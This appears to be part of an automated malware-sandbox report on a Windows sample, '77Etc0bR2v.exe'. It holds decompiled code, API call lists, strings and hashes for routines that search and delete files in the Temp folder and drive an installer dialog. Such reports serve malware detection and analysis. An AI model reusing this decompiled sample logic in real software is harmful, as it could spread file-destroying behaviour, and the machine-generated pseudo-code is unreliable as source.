						L11:
						_push(_t68);
						L00405B7C();
						_t66 = _t38 + _t68;
						_t37 = FindFirstFileA(0x4214a8,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t66 - 1;
								 *_t31 =  *(_t66 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t71 =  &(_v332.cFileName);
							_t46 = E00405684( &(_v332.cFileName), 0x3f);
							__eflags =  *_t46;
							if( *_t46 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t71 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t71 - 0x2e;
							if( *_t71 != 0x2e) {
								L19:
								E00405B66(_t66, _t71);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E0040581E(_t68);
									_t49 = DeleteFileA(_t68);
									__eflags = _t49;
									if(_t49 != 0) {
										E00404F04(0xfffffff2, _t68);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x423f28 =  *0x423f28 + 1;
										} else {
											E00404F04(0xfffffff1, _t68);
											_push(0);
											_push(_t68);
											E004058B4();
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E0040548B(_t66, __eflags, _t68, _a8);
									}
								}
								goto L27;
							}
							_t58 =  *((intOrPtr*)(_t71 + 1));
							__eflags = _t58;
							if(_t58 == 0) {
								goto L27;
							}
							__eflags = _t58 - 0x2e;
							if(_t58 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t71 + 2));
							if( *((char*)(_t71 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t52 = FindNextFileA(_a4,  &_v332);
							__eflags = _t52;
						} while (_t52 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x4214a8 - 0x5c;
					if( *0x4214a8 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405E61(_t68);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E00405659(_t37, _t68);
							E0040581E(_t68);
							_t37 = RemoveDirectoryA(_t68);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404F04(0xffffffe5, _t68);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404F04(0xfffffff1, _t68);
							_push(0);
							_push(_t68);
							return E004058B4();
						}
						L33:
						 *0x423f28 =  *0x423f28 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}


















                                                                                                                        0x00405496
                                                                                                                        0x0040549a
                                                                                                                        0x004054a3
                                                                                                                        0x004054a6
                                                                                                                        0x004054a9
                                                                                                                        0x004054b1
                                                                                                                        0x004054b3
                                                                                                                        0x004054b4
                                                                                                                        0x00000000
                                                                                                                        0x004054b4
                                                                                                                        0x004054c3
                                                                                                                        0x004054c3
                                                                                                                        0x004054c6
                                                                                                                        0x004054c9
                                                                                                                        0x004054dd
                                                                                                                        0x004054e4
                                                                                                                        0x004054e9
                                                                                                                        0x004054eb
                                                                                                                        0x004054fb
                                                                                                                        0x004054ed
                                                                                                                        0x004054ed
                                                                                                                        0x004054f2
                                                                                                                        0x004054f3
                                                                                                                        0x004054f3
                                                                                                                        0x00405500
                                                                                                                        0x00405503
                                                                                                                        0x0040550e
                                                                                                                        0x0040550e
                                                                                                                        0x00405513
                                                                                                                        0x00405514
                                                                                                                        0x00405519
                                                                                                                        0x00405519
                                                                                                                        0x0040551a
                                                                                                                        0x00405529
                                                                                                                        0x0040552b
                                                                                                                        0x00405531
                                                                                                                        0x00405534
                                                                                                                        0x00405537
                                                                                                                        0x004055f4
                                                                                                                        0x004055f4
                                                                                                                        0x004055f8
                                                                                                                        0x004055fa
                                                                                                                        0x004055fa
                                                                                                                        0x004055fa
                                                                                                                        0x004055fa
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040553d
                                                                                                                        0x0040553d
                                                                                                                        0x00405546
                                                                                                                        0x0040554c
                                                                                                                        0x00405551
                                                                                                                        0x00405554
                                                                                                                        0x00405556
                                                                                                                        0x0040555a
                                                                                                                        0x0040555c
                                                                                                                        0x0040555c
                                                                                                                        0x0040555a
                                                                                                                        0x0040555f
                                                                                                                        0x00405562
                                                                                                                        0x00405575
                                                                                                                        0x00405577
                                                                                                                        0x0040557c
                                                                                                                        0x00405583
                                                                                                                        0x0040559b
                                                                                                                        0x004055a1
                                                                                                                        0x004055a7
                                                                                                                        0x004055a9
                                                                                                                        0x004055ce
                                                                                                                        0x004055ab
                                                                                                                        0x004055ab
                                                                                                                        0x004055af
                                                                                                                        0x004055c3
                                                                                                                        0x004055b1
                                                                                                                        0x004055b4
                                                                                                                        0x004055b9
                                                                                                                        0x004055bb
                                                                                                                        0x004055bc
                                                                                                                        0x004055bc
                                                                                                                        0x004055af
                                                                                                                        0x00405585
                                                                                                                        0x0040558b
                                                                                                                        0x0040558d
                                                                                                                        0x00405593
                                                                                                                        0x00405593
                                                                                                                        0x0040558d
                                                                                                                        0x00000000
                                                                                                                        0x00405583
                                                                                                                        0x00405564
                                                                                                                        0x00405567
                                                                                                                        0x00405569
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040556b
                                                                                                                        0x0040556d
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040556f
                                                                                                                        0x00405573
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004055d3
                                                                                                                        0x004055dd
                                                                                                                        0x004055e3
                                                                                                                        0x004055e3
                                                                                                                        0x004055ee
                                                                                                                        0x00000000
                                                                                                                        0x004055ee
                                                                                                                        0x00405505
                                                                                                                        0x0040550c
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004054cb
                                                                                                                        0x004054cb
                                                                                                                        0x004054cd
                                                                                                                        0x004055fe
                                                                                                                        0x00405601
                                                                                                                        0x00405604
                                                                                                                        0x00405656
                                                                                                                        0x00405656
                                                                                                                        0x00405656
                                                                                                                        0x00405606
                                                                                                                        0x00405609
                                                                                                                        0x00405614
                                                                                                                        0x00405619
                                                                                                                        0x0040561b
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040561e
                                                                                                                        0x00405624
                                                                                                                        0x0040562a
                                                                                                                        0x00405630
                                                                                                                        0x00405632
                                                                                                                        0x00000000
                                                                                                                        0x0040564e
                                                                                                                        0x00405634
                                                                                                                        0x00405638
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040563d
                                                                                                                        0x00405642
                                                                                                                        0x00405643
                                                                                                                        0x00000000
                                                                                                                        0x00405644
                                                                                                                        0x0040560b
                                                                                                                        0x0040560b
                                                                                                                        0x00000000
                                                                                                                        0x0040560b
                                                                                                                        0x004054d3
                                                                                                                        0x004054d7
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004054d7

                                                                                                                        APIs
                                                                                                                        • DeleteFileA.KERNEL32(?,?,"C:\Users\user\Desktop\77Etc0bR2v.exe" ,747DF560), ref: 004054A9
                                                                                                                        • lstrcat.KERNEL32(004214A8,\*.*), ref: 004054F3
                                                                                                                        • lstrcat.KERNEL32(?,00409010), ref: 00405514
                                                                                                                        • lstrlen.KERNEL32(?,?,00409010,?,004214A8,?,00000000,?,"C:\Users\user\Desktop\77Etc0bR2v.exe" ,747DF560), ref: 0040551A
                                                                                                                        • FindFirstFileA.KERNEL32(004214A8,?,?,?,00409010,?,004214A8,?,00000000,?,"C:\Users\user\Desktop\77Etc0bR2v.exe" ,747DF560), ref: 0040552B
                                                                                                                        • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 004055DD
                                                                                                                        • FindClose.KERNEL32(?), ref: 004055EE
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 0040548B
                                                                                                                        • "C:\Users\user\Desktop\77Etc0bR2v.exe" , xrefs: 00405495
                                                                                                                        • \*.*, xrefs: 004054ED
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                        • String ID: "C:\Users\user\Desktop\77Etc0bR2v.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                        • API String ID: 2035342205-3636182036
                                                                                                                        • Opcode ID: 7a19b7ea85d0f8bff8962d5b7d174e9fed4053393f49275f79294cdc09bf412a
                                                                                                                        • Instruction ID: bc429f5d1e1b14784ce7e3564347ec6ed469848bfd5577fff983359c073685a4
                                                                                                                        • Opcode Fuzzy Hash: 7a19b7ea85d0f8bff8962d5b7d174e9fed4053393f49275f79294cdc09bf412a
                                                                                                                        • Instruction Fuzzy Hash: 0351F331904A447ADB216B218C45BBF3B79CF42728F54847BF905711E2CB3C5A82DE6E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00405E61, Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E00405E61(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x4224f0);
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4224f0;
			}




                                                                                                                        0x00405e6c
                                                                                                                        0x00405e75
                                                                                                                        0x00000000
                                                                                                                        0x00405e82
                                                                                                                        0x00405e78
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • FindFirstFileA.KERNEL32(?,004224F0,004218A8,0040577D,004218A8,004218A8,00000000,004218A8,004218A8,?,?,747DF560,0040549F,?,"C:\Users\user\Desktop\77Etc0bR2v.exe" ,747DF560), ref: 00405E6C
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00405E78
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2295610775-0
                                                                                                                        • Opcode ID: a0d9290738f1f02d4b3743de2211279f78b4a64d0718c2c828088997ee3199ab
                                                                                                                        • Instruction ID: f2fe444ddfa45285d6a9eb51d657c4c39712a0d2250b7f8498e11f87d01b5aa3
                                                                                                                        • Opcode Fuzzy Hash: a0d9290738f1f02d4b3743de2211279f78b4a64d0718c2c828088997ee3199ab
                                                                                                                        • Instruction Fuzzy Hash: 26D012359495206FC7001738AD0C85B7A58EF553347508B32F969F62E0C7B4AD51DAED
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040263E, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 39%
                                                                                                                        			E0040263E(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E004029F6(2), _t19 - 0x1a4) != 0xffffffff) {
					E00405AC4(__edi, _t6);
					_push(_t19 - 0x178);
					_push(__esi);
					E00405B66();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                                                                                                        0x00402656
                                                                                                                        0x0040266a
                                                                                                                        0x00402675
                                                                                                                        0x00402676
                                                                                                                        0x004027b1
                                                                                                                        0x00402658
                                                                                                                        0x00402658
                                                                                                                        0x0040265a
                                                                                                                        0x0040265c
                                                                                                                        0x0040265c
                                                                                                                        0x0040288e
                                                                                                                        0x0040289a

                                                                                                                        APIs
                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040264D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFindFirst
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1974802433-0
                                                                                                                        • Opcode ID: 92ffb88694b69cf505f42f79ebf7d5c57c45f89139eb01951941d1b42e5af323
                                                                                                                        • Instruction ID: b3d2387cb92b068db8966d6a1439c3c253679041c8135bb289436d91baf53d0e
                                                                                                                        • Opcode Fuzzy Hash: 92ffb88694b69cf505f42f79ebf7d5c57c45f89139eb01951941d1b42e5af323
                                                                                                                        • Instruction Fuzzy Hash: 42F0A072A04201DBD700EBB49A89AEEB7789B51328F60067BE111F20C1C6B85A459B2E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00403A45, Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 76%
                                                                                                                        			E00403A45(struct HWND__* _a4, struct HWND__* _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v92;
				void* _v96;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				void* _t62;
				signed int _t66;
				struct HWND__* _t72;
				signed int _t85;
				struct HWND__* _t90;
				signed int _t98;
				int _t102;
				signed int _t114;
				signed int _t115;
				int _t116;
				signed int _t121;
				struct HWND__* _t124;
				struct HWND__* _t125;
				int _t126;
				long _t129;
				int _t131;
				int _t132;
				void* _t133;

				_t114 = _a8;
				if(_t114 == 0x110 || _t114 == 0x408) {
					_t35 = _a12;
					_t124 = _a4;
					__eflags = _t114 - 0x110;
					 *0x420484 = _t35;
					if(_t114 == 0x110) {
						 *0x423ea8 = _t124;
						 *0x420498 = GetDlgItem(_t124, 1);
						_t90 = GetDlgItem(_t124, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41f460 = _t90;
						E00403F18(_t124);
						SetClassLongA(_t124, 0xfffffff2,  *0x423688);
						 *0x42366c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x420484 = 1;
					}
					_t121 =  *0x4091c4; // 0xffffffff
					_t132 = 0;
					_t129 = (_t121 << 6) +  *0x423ec0;
					__eflags = _t121;
					if(_t121 < 0) {
						L34:
						E00403F64(0x40b);
						while(1) {
							_t37 =  *0x420484;
							 *0x4091c4 =  *0x4091c4 + _t37;
							_t129 = _t129 + (_t37 << 6);
							_t39 =  *0x4091c4; // 0xffffffff
							__eflags = _t39 -  *0x423ec4;
							if(_t39 ==  *0x423ec4) {
								E0040140B(1);
							}
							__eflags =  *0x42366c - _t132;
							if( *0x42366c != _t132) {
								break;
							}
							__eflags =  *0x4091c4 -  *0x423ec4; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t115 =  *(_t129 + 0x14);
							E00405B88(_t115, _t124, _t129, 0x42b800,  *((intOrPtr*)(_t129 + 0x24)));
							_push( *((intOrPtr*)(_t129 + 0x20)));
							_push(0xfffffc19);
							E00403F18(_t124);
							_push( *((intOrPtr*)(_t129 + 0x1c)));
							_push(0xfffffc1b);
							E00403F18(_t124);
							_push( *((intOrPtr*)(_t129 + 0x28)));
							_push(0xfffffc1a);
							E00403F18(_t124);
							_t49 = GetDlgItem(_t124, 3);
							__eflags =  *0x423f2c - _t132;
							_v32 = _t49;
							if( *0x423f2c != _t132) {
								_t115 = _t115 & 0x0000fefd | 0x00000004;
								__eflags = _t115;
							}
							ShowWindow(_t49, _t115 & 0x00000008);
							EnableWindow( *(_t133 + 0x30), _t115 & 0x00000100);
							E00403F3A(_t115 & 0x00000002);
							_t116 = _t115 & 0x00000004;
							EnableWindow( *0x41f460, _t116);
							__eflags = _t116 - _t132;
							if(_t116 == _t132) {
								_push(1);
							} else {
								_push(_t132);
							}
							EnableMenuItem(GetSystemMenu(_t124, _t132), 0xf060, ??);
							SendMessageA( *(_t133 + 0x38), 0xf4, _t132, 1);
							__eflags =  *0x423f2c - _t132;
							if( *0x423f2c == _t132) {
								_push( *0x420498);
							} else {
								SendMessageA(_t124, 0x401, 2, _t132);
								_push( *0x41f460);
							}
							E00403F4D();
							_t62 = E00405B66(0x4204a0, 0x4236a0);
							_push( *((intOrPtr*)(_t129 + 0x18)));
							L00405B7C();
							E00405B88(0x4204a0, _t124, _t129, _t62 + 0x4204a0, 0x4204a0);
							SetWindowTextA(_t124, 0x4204a0);
							_push(_t132);
							_t66 = E00401389( *((intOrPtr*)(_t129 + 8)));
							__eflags = _t66;
							if(_t66 != 0) {
								continue;
							} else {
								__eflags =  *_t129 - _t132;
								if( *_t129 == _t132) {
									continue;
								}
								__eflags =  *(_t129 + 4) - 5;
								if( *(_t129 + 4) != 5) {
									 *0x4071e8( *0x423678);
									 *0x41fc70 = _t129;
									__eflags =  *_t129 - _t132;
									if( *_t129 <= _t132) {
										goto L58;
									}
									_t72 = CreateDialogParamA( *0x423ea0,  *_t129 +  *0x423680 & 0x0000ffff, _t124,  *(0x4091c8 +  *(_t129 + 4) * 4), _t129);
									__eflags = _t72 - _t132;
									 *0x423678 = _t72;
									if(_t72 == _t132) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t129 + 0x2c)));
									_push(6);
									E00403F18(_t72);
									GetWindowRect(GetDlgItem(_t124, 0x3fa), _t133 + 0x10);
									ScreenToClient(_t124, _t133 + 0x10);
									SetWindowPos( *0x423678, _t132,  *(_t133 + 0x20),  *(_t133 + 0x20), _t132, _t132, 0x15);
									_push(_t132);
									E00401389( *((intOrPtr*)(_t129 + 0xc)));
									__eflags =  *0x42366c - _t132;
									if( *0x42366c != _t132) {
										goto L61;
									}
									ShowWindow( *0x423678, 8);
									E00403F64(0x405);
									goto L58;
								}
								__eflags =  *0x423f2c - _t132;
								if( *0x423f2c != _t132) {
									goto L61;
								}
								__eflags =  *0x423f20 - _t132;
								if( *0x423f20 != _t132) {
									continue;
								}
								goto L61;
							}
						}
						 *0x4071e8( *0x423678);
						 *0x423ea8 = _t132;
						EndDialog(_t124,  *0x41f868);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t129 - _t132;
							if( *_t129 == _t132) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t85 = E00401389( *((intOrPtr*)(_t129 + 0x10)));
						__eflags = _t85;
						if(_t85 == 0) {
							goto L33;
						}
						SendMessageA( *0x423678, 0x40f, 0, 1);
						__eflags =  *0x42366c;
						return 0 |  *0x42366c == 0x00000000;
					}
				} else {
					_t124 = _a4;
					_t132 = 0;
					if(_t114 == 0x47) {
						SetWindowPos( *0x420478, _t124, 0, 0, 0, 0, 0x13);
					}
					if(_t114 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420478,  ~(_a12 - 1) & _t114);
					}
					if(_t114 != 0x40d) {
						__eflags = _t114 - 0x11;
						if(_t114 != 0x11) {
							__eflags = _t114 - 0x111;
							if(_t114 != 0x111) {
								L26:
								return E00403F7F(_t114, _a12, _a16);
							}
							_t131 = _a12 & 0x0000ffff;
							_t125 = GetDlgItem(_t124, _t131);
							__eflags = _t125 - _t132;
							if(_t125 == _t132) {
								L13:
								__eflags = _t131 - 1;
								if(_t131 != 1) {
									__eflags = _t131 - 3;
									if(_t131 != 3) {
										_t126 = 2;
										__eflags = _t131 - _t126;
										if(_t131 != _t126) {
											L25:
											SendMessageA( *0x423678, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x423f2c - _t132;
										if( *0x423f2c == _t132) {
											_t98 = E0040140B(3);
											__eflags = _t98;
											if(_t98 != 0) {
												goto L26;
											}
											 *0x41f868 = 1;
											L21:
											_push(0x78);
											L22:
											E00403EF1();
											goto L26;
										}
										E0040140B(_t126);
										 *0x41f868 = _t126;
										goto L21;
									}
									__eflags =  *0x4091c4 - _t132; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t131);
								goto L22;
							}
							SendMessageA(_t125, 0xf3, _t132, _t132);
							_t102 = IsWindowEnabled(_t125);
							__eflags = _t102;
							if(_t102 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t124, _t132, _t132);
						return 1;
					} else {
						 *0x4071e8( *0x423678);
						 *0x423678 = _a8;
						L58:
						if( *0x4214a0 == _t132 &&  *0x423678 != _t132) {
							ShowWindow(_t124, 0xa);
							 *0x4214a0 = 1;
						}
						L61:
						return 0;
					}
				}
			}































                                                                                                                        0x00403a4e
                                                                                                                        0x00403a57
                                                                                                                        0x00403b98
                                                                                                                        0x00403b9c
                                                                                                                        0x00403ba0
                                                                                                                        0x00403ba2
                                                                                                                        0x00403ba7
                                                                                                                        0x00403bb2
                                                                                                                        0x00403bbd
                                                                                                                        0x00403bc2
                                                                                                                        0x00403bc4
                                                                                                                        0x00403bc6
                                                                                                                        0x00403bc9
                                                                                                                        0x00403bce
                                                                                                                        0x00403bdc
                                                                                                                        0x00403be9
                                                                                                                        0x00403bf0
                                                                                                                        0x00403bf0
                                                                                                                        0x00403bf1
                                                                                                                        0x00403bf1
                                                                                                                        0x00403bf6
                                                                                                                        0x00403bfc
                                                                                                                        0x00403c03
                                                                                                                        0x00403c09
                                                                                                                        0x00403c0b
                                                                                                                        0x00403c4b
                                                                                                                        0x00403c50
                                                                                                                        0x00403c55
                                                                                                                        0x00403c55
                                                                                                                        0x00403c5a
                                                                                                                        0x00403c63
                                                                                                                        0x00403c65
                                                                                                                        0x00403c6a
                                                                                                                        0x00403c70
                                                                                                                        0x00403c74
                                                                                                                        0x00403c74
                                                                                                                        0x00403c79
                                                                                                                        0x00403c7f
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00403c8a
                                                                                                                        0x00403c90
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00403c99
                                                                                                                        0x00403ca1
                                                                                                                        0x00403ca6
                                                                                                                        0x00403ca9
                                                                                                                        0x00403caf
                                                                                                                        0x00403cb4
                                                                                                                        0x00403cb7
                                                                                                                        0x00403cbd
                                                                                                                        0x00403cc2
                                                                                                                        0x00403cc5
                                                                                                                        0x00403ccb
                                                                                                                        0x00403cd3
                                                                                                                        0x00403cd9
                                                                                                                        0x00403cdf
                                                                                                                        0x00403ce3
                                                                                                                        0x00403cea
                                                                                                                        0x00403cea
                                                                                                                        0x00403cea
                                                                                                                        0x00403cf4
                                                                                                                        0x00403d06
                                                                                                                        0x00403d12
                                                                                                                        0x00403d17
                                                                                                                        0x00403d21
                                                                                                                        0x00403d27
                                                                                                                        0x00403d29
                                                                                                                        0x00403d2e
                                                                                                                        0x00403d2b
                                                                                                                        0x00403d2b
                                                                                                                        0x00403d2b
                                                                                                                        0x00403d3e
                                                                                                                        0x00403d56
                                                                                                                        0x00403d58
                                                                                                                        0x00403d5e
                                                                                                                        0x00403d73
                                                                                                                        0x00403d60
                                                                                                                        0x00403d69
                                                                                                                        0x00403d6b
                                                                                                                        0x00403d6b
                                                                                                                        0x00403d79
                                                                                                                        0x00403d89
                                                                                                                        0x00403d8e
                                                                                                                        0x00403d92
                                                                                                                        0x00403d9a
                                                                                                                        0x00403da1
                                                                                                                        0x00403da7
                                                                                                                        0x00403dab
                                                                                                                        0x00403db0
                                                                                                                        0x00403db2
                                                                                                                        0x00000000
                                                                                                                        0x00403db8
                                                                                                                        0x00403db8
                                                                                                                        0x00403dba
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00403dc0
                                                                                                                        0x00403dc4
                                                                                                                        0x00403de9
                                                                                                                        0x00403def
                                                                                                                        0x00403df5
                                                                                                                        0x00403df7
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00403e1d
                                                                                                                        0x00403e23
                                                                                                                        0x00403e25
                                                                                                                        0x00403e2a
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00403e30
                                                                                                                        0x00403e33
                                                                                                                        0x00403e36
                                                                                                                        0x00403e4d
                                                                                                                        0x00403e59
                                                                                                                        0x00403e72
                                                                                                                        0x00403e78
                                                                                                                        0x00403e7c
                                                                                                                        0x00403e81
                                                                                                                        0x00403e87
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00403e91
                                                                                                                        0x00403e9c
                                                                                                                        0x00000000
                                                                                                                        0x00403e9c
                                                                                                                        0x00403dc6
                                                                                                                        0x00403dcc
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00403dd2
                                                                                                                        0x00403dd8
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00403dde
                                                                                                                        0x00403db2
                                                                                                                        0x00403ea9
                                                                                                                        0x00403eb5
                                                                                                                        0x00403ebc
                                                                                                                        0x00000000
                                                                                                                        0x00403c0d
                                                                                                                        0x00403c0d
                                                                                                                        0x00403c10
                                                                                                                        0x00403c43
                                                                                                                        0x00403c43
                                                                                                                        0x00403c45
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00403c45
                                                                                                                        0x00403c12
                                                                                                                        0x00403c16
                                                                                                                        0x00403c1b
                                                                                                                        0x00403c1d
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00403c2d
                                                                                                                        0x00403c35
                                                                                                                        0x00000000
                                                                                                                        0x00403c3b
                                                                                                                        0x00403a69
                                                                                                                        0x00403a69
                                                                                                                        0x00403a6d
                                                                                                                        0x00403a72
                                                                                                                        0x00403a81
                                                                                                                        0x00403a81
                                                                                                                        0x00403a8a
                                                                                                                        0x00403a93
                                                                                                                        0x00403a9e
                                                                                                                        0x00403a9e
                                                                                                                        0x00403aaa
                                                                                                                        0x00403ac6
                                                                                                                        0x00403ac9
                                                                                                                        0x00403adc
                                                                                                                        0x00403ae2
                                                                                                                        0x00403b85
                                                                                                                        0x00000000
                                                                                                                        0x00403b8e
                                                                                                                        0x00403ae8
                                                                                                                        0x00403af5
                                                                                                                        0x00403af7
                                                                                                                        0x00403af9
                                                                                                                        0x00403b18
                                                                                                                        0x00403b18
                                                                                                                        0x00403b1b
                                                                                                                        0x00403b20
                                                                                                                        0x00403b23
                                                                                                                        0x00403b33
                                                                                                                        0x00403b34
                                                                                                                        0x00403b36
                                                                                                                        0x00403b6c
                                                                                                                        0x00403b7f
                                                                                                                        0x00000000
                                                                                                                        0x00403b7f
                                                                                                                        0x00403b38
                                                                                                                        0x00403b3e
                                                                                                                        0x00403b57
                                                                                                                        0x00403b5c
                                                                                                                        0x00403b5e
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00403b60
                                                                                                                        0x00403b4c
                                                                                                                        0x00403b4c
                                                                                                                        0x00403b4e
                                                                                                                        0x00403b4e
                                                                                                                        0x00000000
                                                                                                                        0x00403b4e
                                                                                                                        0x00403b41
                                                                                                                        0x00403b46
                                                                                                                        0x00000000
                                                                                                                        0x00403b46
                                                                                                                        0x00403b25
                                                                                                                        0x00403b2b
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00403b2d
                                                                                                                        0x00000000
                                                                                                                        0x00403b2d
                                                                                                                        0x00403b1d
